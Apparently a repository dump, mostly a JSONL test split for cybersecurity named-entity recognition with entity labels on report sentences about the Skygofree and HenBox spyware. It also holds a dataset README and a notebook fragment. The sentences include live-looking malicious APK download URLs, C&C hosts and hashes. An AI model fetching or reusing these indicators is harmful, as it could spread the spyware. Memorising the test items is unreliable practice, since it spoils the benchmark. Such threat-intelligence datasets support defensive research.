+ {"text": "The code contains multiple comments in Italian , here is the most noteworthy example : “ Receive commands from the remote server , here you can set the key commands to command the virus ” Here are the available commands : Name Description cd Change current directory to specified quit Close the socket nggexe Execute received command via Python ’ s subprocess.Popen ( ) without outputs ngguploads Upload specified file to the specified URL nggdownloads Download content from the specified URLs and save to specified file nggfilesystem Dump file structure of the C : path , save it to the file in json format and zip it nggstart_screen nggstop_screen Enable/disable screenshot module .", "spans": {"System: Python": [[338, 344]]}, "info": {"id": "securebert2_test_00116", "source": "securebert2_test"}}
118
+ {"text": "When enabled , it makes a screenshot every 25 seconds nggstart_key nggstop_key Enable/disable keylogging module nggstart_rec nggstop_rec Enable/disable surrounding sounds recording module ngg_status Send components status to the C & C socket * any other * Execute received command via Python ’ s subprocess.Popen ( ) , output result will be sent to the C & C socket .", "spans": {"System: Python": [[285, 291]]}, "info": {"id": "securebert2_test_00117", "source": "securebert2_test"}}
119
+ {"text": "All modules set hidden attributes to their files : Module Paths Exfiltrated data format msconf.exe % APPDATA % /myupd/gen/ % Y % m % d- % H % M % S_filesystem.zip ( file structure dump ) system.exe % APPDATA % /myupd/aud/ % d % m % Y % H % M % S.wav ( surrounding sounds ) update.exe % APPDATA % /myupd_tmp/txt/ % APPDATA % /myupd/txt/ % Y % m % d- % H % M % S.txt ( keylogging ) wow.exe % APPDATA % /myupd/scr/ % Y % m % d- % H % M % S.jpg ( screenshots ) skype_sync2.exe % APPDATA % /myupd_tmp/skype/ % APPDATA % /myupd/skype/ yyyyMMddHHmmss_in.mp3 yyyyMMddHHmmss_out.mp3 ( skype calls records ) Moreover , we found one module written in .Net – skype_sync2.exe .", "spans": {"Indicator: msconf.exe": [[88, 98]], "Indicator: % APPDATA % /myupd/gen/ % Y % m % d- % H % M % S_filesystem.zip ( file structure dump ) system.exe % APPDATA % /myupd/aud/ % d % m % Y % H % M % S.wav ( surrounding sounds ) update.exe % APPDATA % /myupd_tmp/txt/ % APPDATA % /myupd/txt/ % Y % m % d- % H % M % S.txt ( keylogging ) wow.exe % APPDATA % /myupd/scr/ % Y % m % d- % H % M % S.jpg ( screenshots ) skype_sync2.exe % APPDATA % /myupd_tmp/skype/ % APPDATA % /myupd/skype/ yyyyMMddHHmmss_in.mp3": [[99, 550]], "Indicator: yyyyMMddHHmmss_out.mp3": [[551, 573]], "System: .Net": [[640, 644]], "Indicator: skype_sync2.exe": [[647, 662]]}, "info": {"id": "securebert2_test_00118", "source": "securebert2_test"}}
120
+ {"text": "The main purpose of this module is to exfiltrate Skype call recordings .", "spans": {"System: Skype": [[49, 54]]}, "info": {"id": "securebert2_test_00119", "source": "securebert2_test"}}
121
+ {"text": "Just like the previous modules , it contains multiple strings in Italian .", "spans": {}, "info": {"id": "securebert2_test_00120", "source": "securebert2_test"}}
122
+ {"text": "After launch , it downloads a codec for MP3 encoding directly from the C & C server : http : //54.67.109.199/skype_resource/libmp3lame.dll The skype_sync2.exe module has a compilation timestamp – Feb 06 2017 and the following PDB string : \\\\vmware-host\\Shared Folders\\dati\\Backup\\Projects\\REcodin_2\\REcodin_2\\obj\\x86\\Release\\REcodin_2.pdb network.exe is a module for submitting all exfiltrated data to the server .", "spans": {"Indicator: http : //54.67.109.199/skype_resource/libmp3lame.dll": [[86, 138]], "Indicator: skype_sync2.exe": [[143, 158]], "Indicator: \\\\vmware-host\\Shared": [[239, 259]], "Indicator: Folders\\dati\\Backup\\Projects\\REcodin_2\\REcodin_2\\obj\\x86\\Release\\REcodin_2.pdb": [[260, 338]], "Indicator: network.exe": [[339, 350]]}, "info": {"id": "securebert2_test_00121", "source": "securebert2_test"}}
123
+ {"text": "In the observed version of the implant it doesn ’ t have an interface to work with the skype_sync2.exe module .", "spans": {"Indicator: skype_sync2.exe": [[87, 102]]}, "info": {"id": "securebert2_test_00122", "source": "securebert2_test"}}
124
+ {"text": "network.exe submitting to the server code snippet Code similarities We found some code similarities between the implant for Windows and other public accessible projects .", "spans": {"Indicator: network.exe": [[0, 11]], "System: Windows": [[124, 131]]}, "info": {"id": "securebert2_test_00123", "source": "securebert2_test"}}
125
+ {"text": "https : //github.com/El3ct71k/Keylogger/ It appears the developers have copied the functional part of the keylogger module from this project .", "spans": {"Indicator: https : //github.com/El3ct71k/Keylogger/": [[0, 40]]}, "info": {"id": "securebert2_test_00124", "source": "securebert2_test"}}
126
+ {"text": "update.exe module and Keylogger by ‘ El3ct71k ’ code comparison Xenotix Python Keylogger including specified mutex ‘ mutex_var_xboz ’ .", "spans": {"Indicator: update.exe": [[0, 10]], "System: Xenotix Python Keylogger": [[64, 88]]}, "info": {"id": "securebert2_test_00125", "source": "securebert2_test"}}
127
+ {"text": "update.exe module and Xenotix Python Keylogger code comparison ‘ addStartup ’ method from msconf.exe module ‘ addStartup ’ method from Xenotix Python Keylogger Distribution We found several landing pages that spread the Android implants .", "spans": {"Indicator: update.exe": [[0, 10]], "System: Xenotix Python Keylogger": [[22, 46], [135, 159]], "Indicator: msconf.exe": [[90, 100]], "System: Android": [[220, 227]]}, "info": {"id": "securebert2_test_00126", "source": "securebert2_test"}}
128
+ {"text": "Malicious URL Referrer Dates http : //217.194.13.133/tre/internet/Configuratore_3.apk http : //217.194.13.133/tre/internet/ 2015-02-04 to present time http : //217.194.13.133/appPro_AC.apk – 2015-07-01 http : //217.194.13.133/190/configurazione/vodafone/smartphone/VODAFONE % 20Configuratore % 20v5_4_2.apk http : //217.194.13.133/190/configurazione/vodafone/smartphone/index.html 2015-01-20 to present time http : //217.194.13.133/190/configurazione/vodafone/smartphone/Vodafone % 20Configuratore.apk http : //217.194.13.133/190/configurazione/vodafone/smartphone/index.html currently active http : //vodafoneinfinity.sytes.net/tim/internet/Configuratore_TIM.apk http : //vodafoneinfinity.sytes.net/tim/internet/ 2015-03-04 http : //vodafoneinfinity.sytes.net/190/configurazione/vodafone/smartphone/VODAFONE % 20Configuratore % 20v5_4_2.apk http : //vodafoneinfinity.sytes.net/190/configurazione/vodafone/smartphone/ 2015-01-14 http : //windupdate.serveftp.com/wind/LTE/WIND % 20Configuratore % 20v5_4_2.apk http : //windupdate.serveftp.com/wind/LTE/ 2015-03-31 http : //119.network/lte/Internet-TIM-4G-LTE.apk http : //119.network/lte/download.html 2015-02-04 2015-07-20 http : //119.network/lte/Configuratore_TIM.apk 2015-07-08 Many of these domains are outdated , but almost all ( except one – appPro_AC.apk ) samples located on the 217.194.13.133 server are still accessible .", "spans": {"Indicator: http : //217.194.13.133/tre/internet/Configuratore_3.apk": [[29, 85]], "Indicator: http : //217.194.13.133/tre/internet/": [[86, 123]], "Indicator: http : //217.194.13.133/appPro_AC.apk": [[151, 188]], "Indicator: http : //217.194.13.133/190/configurazione/vodafone/smartphone/VODAFONE % 20Configuratore % 20v5_4_2.apk": [[202, 306]], "Indicator: http : //217.194.13.133/190/configurazione/vodafone/smartphone/index.html": [[307, 380], [502, 575]], "Indicator: http : //217.194.13.133/190/configurazione/vodafone/smartphone/Vodafone % 20Configuratore.apk": [[408, 501]], 
"Indicator: http : //vodafoneinfinity.sytes.net/tim/internet/Configuratore_TIM.apk": [[593, 663]], "Indicator: http : //vodafoneinfinity.sytes.net/tim/internet/": [[664, 713]], "Indicator: http : //vodafoneinfinity.sytes.net/190/configurazione/vodafone/smartphone/VODAFONE % 20Configuratore % 20v5_4_2.apk": [[725, 841]], "Indicator: http : //vodafoneinfinity.sytes.net/190/configurazione/vodafone/smartphone/": [[842, 917]], "Indicator: http : //windupdate.serveftp.com/wind/LTE/WIND % 20Configuratore % 20v5_4_2.apk": [[929, 1008]], "Indicator: http : //windupdate.serveftp.com/wind/LTE/": [[1009, 1051]], "Indicator: http : //119.network/lte/Internet-TIM-4G-LTE.apk": [[1063, 1111]], "Indicator: http : //119.network/lte/download.html": [[1112, 1150]], "Indicator: http : //119.network/lte/Configuratore_TIM.apk": [[1173, 1219]], "Indicator: appPro_AC.apk": [[1298, 1311]], "Indicator: 217.194.13.133": [[1337, 1351]]}, "info": {"id": "securebert2_test_00127", "source": "securebert2_test"}}
129
+ {"text": "All the observed landing pages mimic the mobile operators ’ web pages through their domain name and web page content as well .", "spans": {}, "info": {"id": "securebert2_test_00128", "source": "securebert2_test"}}
130
+ {"text": "Further research of the attacker ’ s infrastructure revealed more related mimicking domains .", "spans": {}, "info": {"id": "securebert2_test_00129", "source": "securebert2_test"}}
131
+ {"text": "Unfortunately , for now we can ’ t say in what environment these landing pages were used in the wild , but according to all the information at our dsiposal , we can assume that they are perfect for exploitation using malicious redirects or man-in-the-middle attacks .", "spans": {}, "info": {"id": "securebert2_test_00130", "source": "securebert2_test"}}
132
+ {"text": "For example , this could be when the victim ’ s device connects to a Wi-Fi access point that is infected or controlled by the attackers .", "spans": {}, "info": {"id": "securebert2_test_00131", "source": "securebert2_test"}}
133
+ {"text": "Artifacts During the research , we found plenty of traces of the developers and those doing the maintaining .", "spans": {}, "info": {"id": "securebert2_test_00132", "source": "securebert2_test"}}
134
+ {"text": "As already stated in the ‘ malware features ’ part , there are multiple giveaways in the code .", "spans": {}, "info": {"id": "securebert2_test_00133", "source": "securebert2_test"}}
135
+ {"text": "Here are just some of them : ngglobal – FirebaseCloudMessaging topic name Issuer : CN = negg – from several certificates negg.ddns [ .", "spans": {"Indicator: negg.ddns [ .": [[121, 134]]}, "info": {"id": "securebert2_test_00134", "source": "securebert2_test"}}
136
+ {"text": "] net , negg1.ddns [ .", "spans": {"Indicator: negg1.ddns [ .": [[8, 22]]}, "info": {"id": "securebert2_test_00135", "source": "securebert2_test"}}
137
+ {"text": "] net , negg2.ddns [ .", "spans": {"Indicator: negg2.ddns [ .": [[8, 22]]}, "info": {"id": "securebert2_test_00136", "source": "securebert2_test"}}
138
+ {"text": "] net – C & C servers NG SuperShell – string from the reverse shell payload ngg – prefix in commands names of the implant for Windows Signature with specific issuer Whois records and IP relationships provide many interesting insights as well .", "spans": {"System: Windows": [[126, 133]]}, "info": {"id": "securebert2_test_00137", "source": "securebert2_test"}}
139
+ {"text": "There are a lot of other ‘ Negg ’ mentions in Whois records and references to it .", "spans": {}, "info": {"id": "securebert2_test_00138", "source": "securebert2_test"}}
140
+ {"text": "For example : Conclusions The Skygofree Android implant is one of the most powerful spyware tools that we have ever seen for this platform .", "spans": {"Malware: Skygofree": [[30, 39]], "System: Android": [[40, 47]]}, "info": {"id": "securebert2_test_00139", "source": "securebert2_test"}}
141
+ {"text": "As a result of the long-term development process , there are multiple , exceptional capabilities : usage of multiple exploits for gaining root privileges , a complex payload structure , never-before-seen surveillance features such as recording surrounding audio in specified locations .", "spans": {}, "info": {"id": "securebert2_test_00140", "source": "securebert2_test"}}
142
+ {"text": "Given the many artifacts we discovered in the malware code , as well as infrastructure analysis , we are pretty confident that the developer of the Skygofree implants is an Italian IT company that works on surveillance solutions , just like HackingTeam .", "spans": {"Malware: Skygofree": [[148, 157]], "Organization: HackingTeam": [[241, 252]]}, "info": {"id": "securebert2_test_00141", "source": "securebert2_test"}}
143
+ {"text": "HenBox : The Chickens Come Home to Roost March 13 , 2018 at 5:00 AM Unit 42 recently discovered a new Android malware family we named “ HenBox ” masquerading as a variety of legitimate Android apps .", "spans": {"Malware: HenBox": [[0, 6], [136, 142]], "System: Android": [[102, 109], [185, 192]]}, "info": {"id": "securebert2_test_00142", "source": "securebert2_test"}}
144
+ {"text": "We chose the name “ HenBox ” based on metadata found in most of the malicious apps such as package names and signer detail .", "spans": {"Malware: HenBox": [[20, 26]]}, "info": {"id": "securebert2_test_00143", "source": "securebert2_test"}}
145
+ {"text": "HenBox masquerades as apps such as VPN and Android system apps and often installs legitimate versions of these apps along with HenBox to trick users into thinking they downloaded the legitimate app .", "spans": {"Malware: HenBox": [[0, 6], [127, 133]], "System: Android": [[43, 50]]}, "info": {"id": "securebert2_test_00144", "source": "securebert2_test"}}
146
+ {"text": "While some of the legitimate apps HenBox use as decoys can be found on Google Play , HenBox apps themselves have only been found on third-party ( non-Google Play ) app stores .", "spans": {"Malware: HenBox": [[34, 40], [85, 91]], "System: Google Play": [[71, 82]], "System: Play": [[157, 161]]}, "info": {"id": "securebert2_test_00145", "source": "securebert2_test"}}
147
+ {"text": "HenBox appears to primarily target the Uyghurs – a minority Turkic ethnic group that is primarily Muslim and lives mainly in the Xinjiang Uyghur Autonomous Region in North West China .", "spans": {"Malware: HenBox": [[0, 6]]}, "info": {"id": "securebert2_test_00146", "source": "securebert2_test"}}
148
+ {"text": "It also targets devices made by Chinese manufacturer Xiaomi and those running MIUI , an operating system based on Google Android made by Xiaomi .", "spans": {"Organization: Xiaomi": [[53, 59], [137, 143]], "System: MIUI": [[78, 82]], "System: Google Android": [[114, 128]]}, "info": {"id": "securebert2_test_00147", "source": "securebert2_test"}}
149
+ {"text": "Smartphones are the dominant form of internet access in the region and Xinjiang was recently above the national average of internet users in China .", "spans": {}, "info": {"id": "securebert2_test_00148", "source": "securebert2_test"}}
150
+ {"text": "The result is a large online population who have been the subject of numerous cyber-attacks in the past .", "spans": {}, "info": {"id": "securebert2_test_00149", "source": "securebert2_test"}}
151
+ {"text": "Once installed , HenBox steals information from the devices from a myriad of sources , including many mainstream chat , communication , and social media apps .", "spans": {"Malware: HenBox": [[17, 23]]}, "info": {"id": "securebert2_test_00150", "source": "securebert2_test"}}
152
+ {"text": "The stolen information includes personal and device information .", "spans": {}, "info": {"id": "securebert2_test_00151", "source": "securebert2_test"}}
153
+ {"text": "Of note , in addition to tracking the compromised device ’ s location , HenBox also harvests all outgoing phone numbers with an “ 86 ” prefix , which is the country code for the People ’ s Republic of China ( PRC ) .", "spans": {"Malware: HenBox": [[72, 78]]}, "info": {"id": "securebert2_test_00152", "source": "securebert2_test"}}
154
+ {"text": "It can also access the phone ’ s cameras and microphone .", "spans": {}, "info": {"id": "securebert2_test_00153", "source": "securebert2_test"}}
155
+ {"text": "HenBox has ties to infrastructure used in targeted attacks with a focus on politics in South East Asia .", "spans": {"Malware: HenBox": [[0, 6]]}, "info": {"id": "securebert2_test_00154", "source": "securebert2_test"}}
156
+ {"text": "These attackers have used additional malware families in previous activity dating to at least 2015 that include PlugX , Zupdax , 9002 , and Poison Ivy .", "spans": {"Malware: PlugX": [[112, 117]], "Malware: Zupdax": [[120, 126]], "Malware: 9002": [[129, 133]], "Malware: Poison Ivy": [[140, 150]]}, "info": {"id": "securebert2_test_00155", "source": "securebert2_test"}}
157
+ {"text": "This also aligns with HenBox ’ s timeline , as in total we have identified almost 200 HenBox samples , with the oldest dating to 2015 .", "spans": {"Malware: HenBox": [[22, 28], [86, 92]]}, "info": {"id": "securebert2_test_00156", "source": "securebert2_test"}}
158
+ {"text": "Most of the samples we found date from the last half of 2017 , fewer samples date from 2016 , and a handful date back to 2015 .", "spans": {}, "info": {"id": "securebert2_test_00157", "source": "securebert2_test"}}
159
+ {"text": "In 2018 , we have already observed a small but consistent number of samples .", "spans": {}, "info": {"id": "securebert2_test_00158", "source": "securebert2_test"}}
160
+ {"text": "We believe this indicates a fairly sustained campaign that has gained momentum over recent months .", "spans": {}, "info": {"id": "securebert2_test_00159", "source": "securebert2_test"}}
161
+ {"text": "HenBox Enters the Uyghur App Store In May 2016 , a HenBox app was downloaded from uyghurapps [ .", "spans": {"Malware: HenBox": [[0, 6], [51, 57]], "System: Uyghur App Store": [[18, 34]], "Indicator: uyghurapps [ .": [[82, 96]]}, "info": {"id": "securebert2_test_00160", "source": "securebert2_test"}}
162
+ {"text": "] net .", "spans": {}, "info": {"id": "securebert2_test_00161", "source": "securebert2_test"}}
163
+ {"text": "Specifically , the app was an Android Package ( APK ) file that will be discussed in more detail shortly .", "spans": {"System: Android Package": [[30, 45]]}, "info": {"id": "securebert2_test_00162", "source": "securebert2_test"}}
164
+ {"text": "The domain name , language of the site and app content hosted suggest this site is a third-party app store for whom the intended users are the Uyghurs .", "spans": {}, "info": {"id": "securebert2_test_00163", "source": "securebert2_test"}}
165
+ {"text": "Such app stores are so-called because they are not officially supported by Android , nor are they provided by Google , unlike the Play Store .", "spans": {"System: Android": [[75, 82]], "Organization: Google": [[110, 116]], "System: Play Store": [[130, 140]]}, "info": {"id": "securebert2_test_00164", "source": "securebert2_test"}}
166
+ {"text": "Third-party app stores are ubiquitous in China for a number of reasons including : evermore powerful Chinese Original Equipment Manufacturers ( OEM ) , a lack of an official Chinese Google Play app store , and a growing smartphone market .", "spans": {"Organization: Chinese Original Equipment Manufacturers ( OEM )": [[101, 149]], "System: Google Play": [[182, 193]]}, "info": {"id": "securebert2_test_00165", "source": "securebert2_test"}}
167
+ {"text": "The HenBox app downloaded in May 2016 was masquerading as the DroidVPN app .", "spans": {"Malware: HenBox": [[4, 10]], "Indicator: DroidVPN": [[62, 70]]}, "info": {"id": "securebert2_test_00166", "source": "securebert2_test"}}
168
+ {"text": "At the time of writing , the content served at the given URL on uyghurapps [ .", "spans": {"Indicator: uyghurapps [ .": [[64, 78]]}, "info": {"id": "securebert2_test_00167", "source": "securebert2_test"}}
169
+ {"text": "] net , is now a legitimate version of the DroidVPN app , and looks as shown in Figure 1 below .", "spans": {"Indicator: DroidVPN": [[43, 51]]}, "info": {"id": "securebert2_test_00168", "source": "securebert2_test"}}
170
+ {"text": "henbox_2 Figure 1 Uyghurapps [ .", "spans": {"Indicator: Uyghurapps [ .": [[18, 32]]}, "info": {"id": "securebert2_test_00169", "source": "securebert2_test"}}
171
+ {"text": "] net app store showing the current DroidVPN app Virtual Private Network ( VPN ) tools allow connections to remote private networks , increasing the security and privacy of the user ’ s communications .", "spans": {"Indicator: DroidVPN": [[36, 44]]}, "info": {"id": "securebert2_test_00170", "source": "securebert2_test"}}
172
+ {"text": "According to the DroidVPN app description , it “ helps bypass regional internet restrictions , web filtering and firewalls by tunneling traffic over ICMP. ” Some features may require devices to be rooted to function and according to some 3rd party app stores , unconditional rooting is required , which has additional security implications for the device .", "spans": {"Indicator: DroidVPN": [[17, 25]]}, "info": {"id": "securebert2_test_00171", "source": "securebert2_test"}}
173
+ {"text": "We have not been able to ascertain how the DroidVPN app on the uyghurapps [ .", "spans": {"Indicator: DroidVPN": [[43, 51]], "Indicator: uyghurapps [ .": [[63, 77]]}, "info": {"id": "securebert2_test_00172", "source": "securebert2_test"}}
174
+ {"text": "] net app store was replaced with the malicious HenBox app ; however , some indicators point to the server running an outdated version of Apache Web Server on a Windows 32-Bit operating system .", "spans": {"Malware: HenBox": [[48, 54]], "System: Windows": [[161, 168]]}, "info": {"id": "securebert2_test_00173", "source": "securebert2_test"}}
175
+ {"text": "In light of this , we believe an attack against unpatched vulnerabilities is a reasonable conjecture for how the server was compromised .", "spans": {"Vulnerability: unpatched vulnerabilities": [[48, 73]]}, "info": {"id": "securebert2_test_00174", "source": "securebert2_test"}}
176
+ {"text": "The HenBox app downloaded in May 2016 , as described in Table 1 below , masquerades as a legitimate version of the DroidVPN app by using the same app name “ DroidVPN ” and the same iconography used when displaying the app in Android ’ s launcher view , as highlighted in Figure 2 below Table 1 .", "spans": {"Indicator: DroidVPN": [[115, 123]], "System: DroidVPN": [[157, 165]], "System: Android": [[225, 232]]}, "info": {"id": "securebert2_test_00175", "source": "securebert2_test"}}
177
+ {"text": "APK SHA256 Size ( bytes ) First Seen App Package name App name 0589bed1e3b3d6234c30061be3be1cc6685d786ab3a892a8d4dae8e2d7ed92f7 2,740,860 May 2016 com.android.henbox DroidVPN Table 1 Details of the HenBox DroidVPN app on the uyghurapps [ .", "spans": {"Indicator: 0589bed1e3b3d6234c30061be3be1cc6685d786ab3a892a8d4dae8e2d7ed92f7": [[63, 127]], "Indicator: com.android.henbox": [[147, 165]], "System: DroidVPN": [[166, 174], [205, 213]], "Malware: HenBox": [[198, 204]], "Indicator: uyghurapps [ .": [[225, 239]]}, "info": {"id": "securebert2_test_00176", "source": "securebert2_test"}}
178
+ {"text": "] net app store henbox_3 Figure 2 HenBox app installed , purporting to be DroidVPN Depending on the language setting on the device , and for this particular variant of HenBox , the installed HenBox app may have the name “ Backup ” but uses the same DroidVPN logo .", "spans": {"Malware: HenBox": [[34, 40], [168, 174], [191, 197]], "Indicator: DroidVPN": [[74, 82], [249, 257]]}, "info": {"id": "securebert2_test_00177", "source": "securebert2_test"}}
179
+ {"text": "Other variants use other names and logos , as described later .", "spans": {}, "info": {"id": "securebert2_test_00178", "source": "securebert2_test"}}
180
+ {"text": "Given the DroidVPN look and feel being used by this variant of HenBox , it ’ s highly likely the uyghurapps [ .", "spans": {"Indicator: DroidVPN": [[10, 18]], "Malware: HenBox": [[63, 69]], "Indicator: uyghurapps [ .": [[97, 111]]}, "info": {"id": "securebert2_test_00179", "source": "securebert2_test"}}
181
+ {"text": "] net page for DroidVPN remained identical when serving either HenBox or DroidVPN apps , just that the legitimate APK file had been replaced with HenBox for an unknown period of time .", "spans": {"Indicator: DroidVPN": [[15, 23], [73, 81]], "Malware: HenBox": [[63, 69]]}, "info": {"id": "securebert2_test_00180", "source": "securebert2_test"}}
182
+ {"text": "In addition to the look and feel of DroidVPN , this HenBox variant also contained a legitimate DroidVPN app within its APK package as an asset , which could be compared to a resource item within a Windows Portable Executable ( PE ) file .", "spans": {"Indicator: DroidVPN": [[36, 44], [95, 103]], "Malware: HenBox": [[52, 58]], "System: Windows Portable Executable": [[197, 224]]}, "info": {"id": "securebert2_test_00181", "source": "securebert2_test"}}
183
+ {"text": "Once the HenBox app is installed and launched , it launches an install process for the embedded app as a decoy to other malicious behaviors occurring in the background , and to satisfy the victim with the app they were requesting , assuming they requested to download a particular app , such as DroidVPN .", "spans": {"Malware: HenBox": [[9, 15]], "System: DroidVPN": [[295, 303]]}, "info": {"id": "securebert2_test_00182", "source": "securebert2_test"}}
184
+ {"text": "The version of the legitimate DroidVPN embedded inside this HenBox variant is the same version of DroidVPN available for download from uyghurapps [ .", "spans": {"Indicator: DroidVPN": [[30, 38], [98, 106]], "Malware: HenBox": [[60, 66]], "Indicator: uyghurapps [ .": [[135, 149]]}, "info": {"id": "securebert2_test_00183", "source": "securebert2_test"}}
185
+ {"text": "] net , at the time of writing .", "spans": {}, "info": {"id": "securebert2_test_00184", "source": "securebert2_test"}}
186
+ {"text": "It ’ s worth noting , newer versions of the DroidVPN app are available on Google Play , as well as in some other third-party app stores , which could indicate uyghurapps [ .", "spans": {"System: DroidVPN": [[44, 52]], "System: Google Play": [[74, 85]], "Indicator: uyghurapps [ .": [[159, 173]]}, "info": {"id": "securebert2_test_00185", "source": "securebert2_test"}}
187
+ {"text": "] net is not awfully well maintained or updated to the latest apps available .", "spans": {}, "info": {"id": "securebert2_test_00186", "source": "securebert2_test"}}
188
+ {"text": "At the time of writing , to our knowledge no other third-party app stores , nor the official Google Play store , were or are hosting this malicious HenBox variant masquerading as DroidVPN .", "spans": {"System: Google Play": [[93, 104]], "Malware: HenBox": [[148, 154]], "Indicator: DroidVPN": [[179, 187]]}, "info": {"id": "securebert2_test_00187", "source": "securebert2_test"}}
189
+ {"text": "The Right App at the Right Time The malicious HenBox and embedded DroidVPN app combination is one instance of the type of legitimate apps the attackers choose to mimic to compromise their victims .", "spans": {"Malware: HenBox": [[46, 52]], "Indicator: DroidVPN": [[66, 74]]}, "info": {"id": "securebert2_test_00188", "source": "securebert2_test"}}
190
+ {"text": "These threat actors frequently offer malicious apps purporting to be legitimate apps that are broadly used or important to a targeted population .", "spans": {}, "info": {"id": "securebert2_test_00189", "source": "securebert2_test"}}
191
+ {"text": "It ’ s worth noting however , about one-third of the HenBox apps contained embedded APK objects that did not refer to legitimate apps .", "spans": {"Malware: HenBox": [[53, 59]]}, "info": {"id": "securebert2_test_00190", "source": "securebert2_test"}}
192
+ {"text": "Some were only 3 bytes long , containing strings such as “ ddd ” and “ 333 ” , or were otherwise corrupted .", "spans": {}, "info": {"id": "securebert2_test_00191", "source": "securebert2_test"}}
193
+ {"text": "Beyond the previously mentioned DroidVPN example , other viable embedded apps we found include apps currently available on Google Play , as well as many third-party app stores .", "spans": {"Indicator: DroidVPN": [[32, 40]], "System: Google Play": [[123, 134]]}, "info": {"id": "securebert2_test_00192", "source": "securebert2_test"}}
194
+ {"text": "Table 2 below lists some of these apps with their respective metadata .", "spans": {}, "info": {"id": "securebert2_test_00193", "source": "securebert2_test"}}
195
+ {"text": "Sample 1 marks the first HenBox sample we saw embedding a legitimate app within its assets to be dropped and installed on the victim device as a decoy .", "spans": {"Malware: HenBox": [[25, 31]]}, "info": {"id": "securebert2_test_00194", "source": "securebert2_test"}}
196
+ {"text": "The legitimate app in question was a Uyghur language keyboard app targeted at native speakers of the Uyghur language and their smartphones .", "spans": {}, "info": {"id": "securebert2_test_00195", "source": "securebert2_test"}}
197
+ {"text": "Sample 2 , has the package name cn.android.setting masquerading as Android ’ s Settings app , which has a similar package name ( com.android.settings ) .", "spans": {"Indicator: cn.android.setting": [[32, 50]], "System: Settings app": [[79, 91]], "Indicator: com.android.settings": [[129, 149]]}, "info": {"id": "securebert2_test_00196", "source": "securebert2_test"}}
198
+ {"text": "This variant of HenBox also used the common green Android figure as the app logo and was named 设置 ( “ Backup ” in English ) .", "spans": {"Malware: HenBox": [[16, 22]], "System: Android": [[50, 57]]}, "info": {"id": "securebert2_test_00197", "source": "securebert2_test"}}
199
+ {"text": "This variant ’ s app name , along with many others , is written in Chinese and describes the app as a backup tool .", "spans": {}, "info": {"id": "securebert2_test_00198", "source": "securebert2_test"}}
200
+ {"text": "Please see the IOCs section for all app and package name combinations .", "spans": {}, "info": {"id": "securebert2_test_00199", "source": "securebert2_test"}}
data/processed/backup/securebert2_train.jsonl ADDED
The diff for this file is too large to render. See raw diff
 
data/raw/APTNER/APTNERdev.txt ADDED
The diff for this file is too large to render. See raw diff
 
data/raw/APTNER/APTNERtest.txt ADDED
The diff for this file is too large to render. See raw diff
 
data/raw/APTNER/APTNERtrain.txt ADDED
The diff for this file is too large to render. See raw diff
 
data/raw/APTNER/README.md ADDED
@@ -0,0 +1,6 @@
 
 
 
 
 
 
 
1
+ # APTNER
2
+ APTNER provides a new dataset for NER missions in the cyber threat intelligence (CTI) field. We have defined 21 entity types.
3
+ <p>
4
+ If you use the dataset, please cite this paper:
5
+ Xuren Wang, Songheng He, Zihan Xiong, Xinxin Wei, Zhangwei Jiang, Sihan Chen, Jun Jiang. APTNER: A Specific Dataset for NER Missions in Cyber Threat Intelligence Field[C]//2022 IEEE 25th International Conference on Computer Supported Cooperative Work in Design, CSCWD 2022, p 1233-1238. 2022.05
6
+ </p>
data/raw/CyNER/.gitignore ADDED
@@ -0,0 +1,15 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ .DS_Store
2
+ __pycache__/
3
+ *.ipynb_checkpoints
4
+ nohup.out
5
+ .python-version
6
+ *.pyc
7
+ .idea
8
+ build
9
+ *.egg-info
10
+ dist
11
+
12
+ ckpt*
13
+ vocab
14
+ apex
15
+ cache
data/raw/CyNER/CyNER Demo.ipynb ADDED
@@ -0,0 +1,254 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "cells": [
3
+ {
4
+ "cell_type": "markdown",
5
+ "id": "c0343121",
6
+ "metadata": {},
7
+ "source": [
8
+ "#### Import CyNER and get model"
9
+ ]
10
+ },
11
+ {
12
+ "cell_type": "code",
13
+ "execution_count": 1,
14
+ "id": "b954353d",
15
+ "metadata": {},
16
+ "outputs": [],
17
+ "source": [
18
+ "import cyner"
19
+ ]
20
+ },
21
+ {
22
+ "cell_type": "markdown",
23
+ "id": "4749a612",
24
+ "metadata": {},
25
+ "source": [
26
+ "#### Model1: Only using pretrained transformers"
27
+ ]
28
+ },
29
+ {
30
+ "cell_type": "code",
31
+ "execution_count": 2,
32
+ "id": "3766f0e3",
33
+ "metadata": {},
34
+ "outputs": [],
35
+ "source": [
36
+ "model1 = cyner.CyNER(transformer_model='xlm-roberta-large', use_heuristic=False, flair_model=None)"
37
+ ]
38
+ },
39
+ {
40
+ "cell_type": "code",
41
+ "execution_count": 3,
42
+ "id": "e4931f22",
43
+ "metadata": {},
44
+ "outputs": [
45
+ {
46
+ "name": "stdout",
47
+ "output_type": "stream",
48
+ "text": [
49
+ "Proofpoint report mentions that the German-language messages were turned off once the UK messages were established, indicating a conscious effort to spread FluBot 446833e3f8b04d4c3c2d2288e456328266524e396adbfeba3769d00727481e80 in Android phones.\n"
50
+ ]
51
+ }
52
+ ],
53
+ "source": [
54
+ "text = 'Proofpoint report mentions that the German-language messages were turned off once the UK messages were established, indicating a conscious effort to spread FluBot 446833e3f8b04d4c3c2d2288e456328266524e396adbfeba3769d00727481e80 in Android phones.'\n",
55
+ "print(text)"
56
+ ]
57
+ },
58
+ {
59
+ "cell_type": "code",
60
+ "execution_count": 4,
61
+ "id": "f8f94a99",
62
+ "metadata": {},
63
+ "outputs": [
64
+ {
65
+ "name": "stderr",
66
